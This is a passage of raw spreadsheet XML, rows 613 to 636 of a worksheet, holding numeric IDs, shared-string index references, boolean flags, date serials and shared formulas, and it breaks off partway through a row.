    <row r="613">
      <c r="A613" s="1">
        <v>8851.0</v>
      </c>
      <c r="B613" s="2" t="s">
        <v>2815</v>
      </c>
      <c r="C613" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D613" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E613" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F613" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G613" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H613" s="1" t="s">
        <v>2816</v>
      </c>
      <c r="I613" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J613" s="1" t="s">
        <v>2797</v>
      </c>
      <c r="K613" s="2" t="s">
        <v>2798</v>
      </c>
      <c r="L613" s="1">
        <v>4.0</v>
      </c>
      <c r="M613" s="1">
        <v>11.0</v>
      </c>
      <c r="N613" s="1" t="s">
        <v>137</v>
      </c>
      <c r="O613" s="1" t="s">
        <v>2799</v>
      </c>
      <c r="P613" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q613" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R613" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S613" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="1">
        <v>8852.0</v>
      </c>
      <c r="B614" s="2" t="s">
        <v>2817</v>
      </c>
      <c r="C614" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D614" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E614" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F614" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G614" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H614" s="1" t="s">
        <v>2818</v>
      </c>
      <c r="I614" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J614" s="1" t="s">
        <v>2797</v>
      </c>
      <c r="K614" s="2" t="s">
        <v>2798</v>
      </c>
      <c r="L614" s="1">
        <v>4.0</v>
      </c>
      <c r="M614" s="1">
        <v>11.0</v>
      </c>
      <c r="N614" s="1" t="s">
        <v>2819</v>
      </c>
      <c r="O614" s="1" t="s">
        <v>2799</v>
      </c>
      <c r="P614" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q614" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R614" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S614" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="1">
        <v>8853.0</v>
      </c>
      <c r="B615" s="2" t="s">
        <v>2820</v>
      </c>
      <c r="C615" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D615" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E615" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F615" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G615" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H615" s="1" t="s">
        <v>2821</v>
      </c>
      <c r="I615" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J615" s="1" t="s">
        <v>2797</v>
      </c>
      <c r="K615" s="2" t="s">
        <v>2798</v>
      </c>
      <c r="L615" s="1">
        <v>4.0</v>
      </c>
      <c r="M615" s="1">
        <v>11.0</v>
      </c>
      <c r="N615" s="1" t="s">
        <v>2822</v>
      </c>
      <c r="O615" s="1" t="s">
        <v>2799</v>
      </c>
      <c r="P615" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q615" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R615" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S615" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="1">
        <v>8854.0</v>
      </c>
      <c r="B616" s="2" t="s">
        <v>2823</v>
      </c>
      <c r="C616" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D616" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E616" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F616" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G616" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H616" s="1" t="s">
        <v>2824</v>
      </c>
      <c r="I616" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J616" s="1" t="s">
        <v>2797</v>
      </c>
      <c r="K616" s="2" t="s">
        <v>2798</v>
      </c>
      <c r="L616" s="1">
        <v>4.0</v>
      </c>
      <c r="M616" s="1">
        <v>11.0</v>
      </c>
      <c r="N616" s="1" t="s">
        <v>2825</v>
      </c>
      <c r="O616" s="1" t="s">
        <v>2799</v>
      </c>
      <c r="P616" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q616" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R616" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S616" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="1">
        <v>8855.0</v>
      </c>
      <c r="B617" s="2" t="s">
        <v>2826</v>
      </c>
      <c r="C617" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D617" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E617" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F617" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G617" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H617" s="1" t="s">
        <v>2827</v>
      </c>
      <c r="I617" s="1" t="s">
        <v>2828</v>
      </c>
      <c r="J617" s="1" t="s">
        <v>2829</v>
      </c>
      <c r="K617" s="2" t="s">
        <v>2830</v>
      </c>
      <c r="L617" s="1">
        <v>2.0</v>
      </c>
      <c r="M617" s="1">
        <v>3.0</v>
      </c>
      <c r="N617" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O617" s="1" t="s">
        <v>2831</v>
      </c>
      <c r="P617" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q617" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R617" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S617" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="1">
        <v>8856.0</v>
      </c>
      <c r="B618" s="2" t="s">
        <v>2832</v>
      </c>
      <c r="C618" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D618" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E618" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F618" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G618" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H618" s="1" t="s">
        <v>2833</v>
      </c>
      <c r="I618" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J618" s="1" t="s">
        <v>2834</v>
      </c>
      <c r="K618" s="2" t="s">
        <v>2830</v>
      </c>
      <c r="L618" s="1">
        <v>2.0</v>
      </c>
      <c r="M618" s="1">
        <v>3.0</v>
      </c>
      <c r="N618" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O618" s="1" t="s">
        <v>2835</v>
      </c>
      <c r="P618" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q618" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R618" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S618" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="1">
        <v>8857.0</v>
      </c>
      <c r="B619" s="2" t="s">
        <v>2832</v>
      </c>
      <c r="C619" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D619" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E619" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F619" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G619" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H619" s="1" t="s">
        <v>2836</v>
      </c>
      <c r="I619" s="1" t="s">
        <v>2837</v>
      </c>
      <c r="J619" s="1" t="s">
        <v>2838</v>
      </c>
      <c r="K619" s="2" t="s">
        <v>2830</v>
      </c>
      <c r="L619" s="1">
        <v>3.0</v>
      </c>
      <c r="M619" s="1">
        <v>5.0</v>
      </c>
      <c r="N619" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O619" s="1" t="s">
        <v>2839</v>
      </c>
      <c r="P619" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q619" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R619" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S619" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="1">
        <v>8858.0</v>
      </c>
      <c r="B620" s="2" t="s">
        <v>2832</v>
      </c>
      <c r="C620" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D620" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E620" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F620" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G620" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H620" s="1" t="s">
        <v>2836</v>
      </c>
      <c r="I620" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J620" s="1" t="s">
        <v>2840</v>
      </c>
      <c r="K620" s="2" t="s">
        <v>2830</v>
      </c>
      <c r="L620" s="1">
        <v>1.0</v>
      </c>
      <c r="M620" s="1">
        <v>1.0</v>
      </c>
      <c r="N620" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O620" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P620" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q620" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R620" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S620" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="1">
        <v>8860.0</v>
      </c>
      <c r="B621" s="2" t="s">
        <v>2841</v>
      </c>
      <c r="C621" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D621" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E621" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F621" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G621" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H621" s="1" t="s">
        <v>2842</v>
      </c>
      <c r="I621" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J621" s="1" t="s">
        <v>2834</v>
      </c>
      <c r="K621" s="2" t="s">
        <v>2830</v>
      </c>
      <c r="L621" s="1">
        <v>2.0</v>
      </c>
      <c r="M621" s="1">
        <v>3.0</v>
      </c>
      <c r="N621" s="1" t="s">
        <v>2395</v>
      </c>
      <c r="O621" s="1" t="s">
        <v>2835</v>
      </c>
      <c r="P621" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q621" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R621" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S621" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="1">
        <v>8863.0</v>
      </c>
      <c r="B622" s="2" t="s">
        <v>2832</v>
      </c>
      <c r="C622" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D622" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E622" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F622" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G622" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H622" s="1" t="s">
        <v>2843</v>
      </c>
      <c r="I622" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J622" s="1" t="s">
        <v>2844</v>
      </c>
      <c r="K622" s="2" t="s">
        <v>2830</v>
      </c>
      <c r="L622" s="1">
        <v>3.0</v>
      </c>
      <c r="M622" s="1">
        <v>5.0</v>
      </c>
      <c r="N622" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O622" s="1" t="s">
        <v>2845</v>
      </c>
      <c r="P622" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q622" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R622" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S622" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="1">
        <v>8873.0</v>
      </c>
      <c r="B623" s="2" t="s">
        <v>2846</v>
      </c>
      <c r="C623" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D623" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E623" s="2" t="s">
        <v>2118</v>
      </c>
      <c r="F623" s="1" t="s">
        <v>771</v>
      </c>
      <c r="G623" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H623" s="4">
        <v>44896.68125</v>
      </c>
      <c r="I623" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J623" s="1" t="s">
        <v>2847</v>
      </c>
      <c r="K623" s="2" t="s">
        <v>2848</v>
      </c>
      <c r="L623" s="1">
        <v>2.0</v>
      </c>
      <c r="M623" s="1">
        <v>3.0</v>
      </c>
      <c r="N623" s="1" t="s">
        <v>2849</v>
      </c>
      <c r="O623" s="1" t="s">
        <v>2850</v>
      </c>
      <c r="P623" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q623" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R623" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S623" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="1">
        <v>8874.0</v>
      </c>
      <c r="B624" s="2" t="s">
        <v>2851</v>
      </c>
      <c r="C624" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D624" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E624" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F624" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G624" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H624" s="1" t="s">
        <v>2852</v>
      </c>
      <c r="I624" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J624" s="1" t="s">
        <v>2847</v>
      </c>
      <c r="K624" s="2" t="s">
        <v>2848</v>
      </c>
      <c r="L624" s="1">
        <v>2.0</v>
      </c>
      <c r="M624" s="1">
        <v>3.0</v>
      </c>
      <c r="N624" s="1" t="s">
        <v>2853</v>
      </c>
      <c r="O624" s="1" t="s">
        <v>2850</v>
      </c>
      <c r="P624" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q624" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R624" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S624" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="1">
        <v>8875.0</v>
      </c>
      <c r="B625" s="2" t="s">
        <v>2854</v>
      </c>
      <c r="C625" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D625" s="2" t="s">
        <v>2855</v>
      </c>
      <c r="E625" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F625" s="1" t="s">
        <v>1641</v>
      </c>
      <c r="G625" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H625" s="1" t="s">
        <v>2856</v>
      </c>
      <c r="I625" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J625" s="1" t="s">
        <v>2857</v>
      </c>
      <c r="K625" s="2" t="s">
        <v>2858</v>
      </c>
      <c r="L625" s="1">
        <v>2.0</v>
      </c>
      <c r="M625" s="1">
        <v>2.0</v>
      </c>
      <c r="N625" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O625" s="1" t="s">
        <v>2859</v>
      </c>
      <c r="P625" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q625" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R625" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S625" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="1">
        <v>8876.0</v>
      </c>
      <c r="B626" s="2" t="s">
        <v>2860</v>
      </c>
      <c r="C626" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D626" s="2" t="s">
        <v>2861</v>
      </c>
      <c r="E626" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F626" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G626" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H626" s="1" t="s">
        <v>2862</v>
      </c>
      <c r="I626" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J626" s="1" t="s">
        <v>2857</v>
      </c>
      <c r="K626" s="2" t="s">
        <v>2858</v>
      </c>
      <c r="L626" s="1">
        <v>2.0</v>
      </c>
      <c r="M626" s="1">
        <v>2.0</v>
      </c>
      <c r="N626" s="1" t="s">
        <v>2859</v>
      </c>
      <c r="O626" s="1" t="s">
        <v>2859</v>
      </c>
      <c r="P626" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q626" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R626" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S626" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="1">
        <v>8881.0</v>
      </c>
      <c r="B627" s="2" t="s">
        <v>2863</v>
      </c>
      <c r="C627" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D627" s="2" t="s">
        <v>2864</v>
      </c>
      <c r="E627" s="2" t="s">
        <v>405</v>
      </c>
      <c r="F627" s="1" t="s">
        <v>2865</v>
      </c>
      <c r="G627" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H627" s="1" t="s">
        <v>2866</v>
      </c>
      <c r="I627" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J627" s="1" t="s">
        <v>2867</v>
      </c>
      <c r="K627" s="2" t="s">
        <v>2868</v>
      </c>
      <c r="L627" s="1">
        <v>10.0</v>
      </c>
      <c r="M627" s="1">
        <v>11.0</v>
      </c>
      <c r="N627" s="1" t="s">
        <v>360</v>
      </c>
      <c r="O627" s="1" t="s">
        <v>2869</v>
      </c>
      <c r="P627" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q627" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R627" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S627" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="1">
        <v>8888.0</v>
      </c>
      <c r="B628" s="2" t="s">
        <v>2870</v>
      </c>
      <c r="C628" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D628" s="2" t="s">
        <v>2871</v>
      </c>
      <c r="E628" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F628" s="1" t="s">
        <v>2872</v>
      </c>
      <c r="G628" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H628" s="1" t="s">
        <v>2873</v>
      </c>
      <c r="I628" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J628" s="1" t="s">
        <v>2874</v>
      </c>
      <c r="K628" s="2" t="s">
        <v>2875</v>
      </c>
      <c r="L628" s="1">
        <v>3.0</v>
      </c>
      <c r="M628" s="1">
        <v>3.0</v>
      </c>
      <c r="N628" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O628" s="1" t="s">
        <v>2876</v>
      </c>
      <c r="P628" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q628" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R628" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S628" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="1">
        <v>8889.0</v>
      </c>
      <c r="B629" s="2" t="s">
        <v>2877</v>
      </c>
      <c r="C629" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D629" s="2" t="s">
        <v>2871</v>
      </c>
      <c r="E629" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F629" s="1" t="s">
        <v>2878</v>
      </c>
      <c r="G629" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H629" s="1" t="s">
        <v>2879</v>
      </c>
      <c r="I629" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J629" s="1" t="s">
        <v>2874</v>
      </c>
      <c r="K629" s="2" t="s">
        <v>2875</v>
      </c>
      <c r="L629" s="1">
        <v>3.0</v>
      </c>
      <c r="M629" s="1">
        <v>3.0</v>
      </c>
      <c r="N629" s="1" t="s">
        <v>2725</v>
      </c>
      <c r="O629" s="1" t="s">
        <v>2876</v>
      </c>
      <c r="P629" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q629" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R629" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S629" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="1">
        <v>8893.0</v>
      </c>
      <c r="B630" s="2" t="s">
        <v>2880</v>
      </c>
      <c r="C630" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D630" s="2" t="s">
        <v>2871</v>
      </c>
      <c r="E630" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F630" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G630" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H630" s="1" t="s">
        <v>2881</v>
      </c>
      <c r="I630" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J630" s="1" t="s">
        <v>2882</v>
      </c>
      <c r="K630" s="2" t="s">
        <v>2883</v>
      </c>
      <c r="L630" s="1">
        <v>5.0</v>
      </c>
      <c r="M630" s="1">
        <v>6.0</v>
      </c>
      <c r="N630" s="1" t="s">
        <v>1139</v>
      </c>
      <c r="O630" s="1" t="s">
        <v>2884</v>
      </c>
      <c r="P630" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q630" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R630" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S630" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="1">
        <v>8898.0</v>
      </c>
      <c r="B631" s="2" t="s">
        <v>2885</v>
      </c>
      <c r="C631" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D631" s="2" t="s">
        <v>2579</v>
      </c>
      <c r="E631" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F631" s="1" t="s">
        <v>771</v>
      </c>
      <c r="G631" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H631" s="1" t="s">
        <v>2886</v>
      </c>
      <c r="I631" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J631" s="1" t="s">
        <v>2887</v>
      </c>
      <c r="K631" s="2" t="s">
        <v>2888</v>
      </c>
      <c r="L631" s="1">
        <v>3.0</v>
      </c>
      <c r="M631" s="1">
        <v>8.0</v>
      </c>
      <c r="N631" s="1" t="s">
        <v>2889</v>
      </c>
      <c r="O631" s="1" t="s">
        <v>2890</v>
      </c>
      <c r="P631" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q631" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R631" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S631" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="1">
        <v>8900.0</v>
      </c>
      <c r="B632" s="2" t="s">
        <v>2891</v>
      </c>
      <c r="C632" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D632" s="2" t="s">
        <v>2579</v>
      </c>
      <c r="E632" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F632" s="1" t="s">
        <v>629</v>
      </c>
      <c r="G632" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H632" s="1" t="s">
        <v>2892</v>
      </c>
      <c r="I632" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J632" s="1" t="s">
        <v>2887</v>
      </c>
      <c r="K632" s="2" t="s">
        <v>2888</v>
      </c>
      <c r="L632" s="1">
        <v>3.0</v>
      </c>
      <c r="M632" s="1">
        <v>8.0</v>
      </c>
      <c r="N632" s="1" t="s">
        <v>2332</v>
      </c>
      <c r="O632" s="1" t="s">
        <v>2890</v>
      </c>
      <c r="P632" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q632" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R632" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S632" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="1">
        <v>8902.0</v>
      </c>
      <c r="B633" s="2" t="s">
        <v>2893</v>
      </c>
      <c r="C633" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D633" s="2" t="s">
        <v>2579</v>
      </c>
      <c r="E633" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F633" s="1" t="s">
        <v>629</v>
      </c>
      <c r="G633" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H633" s="1" t="s">
        <v>2894</v>
      </c>
      <c r="I633" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J633" s="1" t="s">
        <v>2887</v>
      </c>
      <c r="K633" s="2" t="s">
        <v>2888</v>
      </c>
      <c r="L633" s="1">
        <v>3.0</v>
      </c>
      <c r="M633" s="1">
        <v>8.0</v>
      </c>
      <c r="N633" s="1" t="s">
        <v>2895</v>
      </c>
      <c r="O633" s="1" t="s">
        <v>2890</v>
      </c>
      <c r="P633" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q633" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R633" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S633" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="1">
        <v>8903.0</v>
      </c>
      <c r="B634" s="2" t="s">
        <v>2896</v>
      </c>
      <c r="C634" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D634" s="2" t="s">
        <v>2579</v>
      </c>
      <c r="E634" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F634" s="1" t="s">
        <v>771</v>
      </c>
      <c r="G634" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H634" s="4">
        <v>44746.47777777778</v>
      </c>
      <c r="I634" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J634" s="1" t="s">
        <v>2887</v>
      </c>
      <c r="K634" s="2" t="s">
        <v>2888</v>
      </c>
      <c r="L634" s="1">
        <v>3.0</v>
      </c>
      <c r="M634" s="1">
        <v>8.0</v>
      </c>
      <c r="N634" s="1" t="s">
        <v>2897</v>
      </c>
      <c r="O634" s="1" t="s">
        <v>2890</v>
      </c>
      <c r="P634" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q634" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R634" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S634" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="1">
        <v>8904.0</v>
      </c>
      <c r="B635" s="2" t="s">
        <v>2898</v>
      </c>
      <c r="C635" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D635" s="2" t="s">
        <v>2579</v>
      </c>
      <c r="E635" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F635" s="1" t="s">
        <v>629</v>
      </c>
      <c r="G635" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H635" s="4">
        <v>44838.2</v>
      </c>
      <c r="I635" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J635" s="1" t="s">
        <v>2887</v>
      </c>
      <c r="K635" s="2" t="s">
        <v>2888</v>
      </c>
      <c r="L635" s="1">
        <v>3.0</v>
      </c>
      <c r="M635" s="1">
        <v>8.0</v>
      </c>
      <c r="N635" s="1" t="s">
        <v>2899</v>
      </c>
      <c r="O635" s="1" t="s">
        <v>2890</v>
      </c>
      <c r="P635" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q635" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R635" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S635" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="1">
        <v>8928.0</v>
      </c>
      <c r="B636" s="2" t="s">
        <v>2900</v>
      </c>
      <c r="C636" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D636" s="2" t="s">
        <v>2901</v>
      </c>
      <c r="E636" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F636" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G636" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H636" s="4">
        <v>44448.02777777778</v>
      </c>
      <c r="I636" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J636" s="1" t="s">
        <v>2902</v>
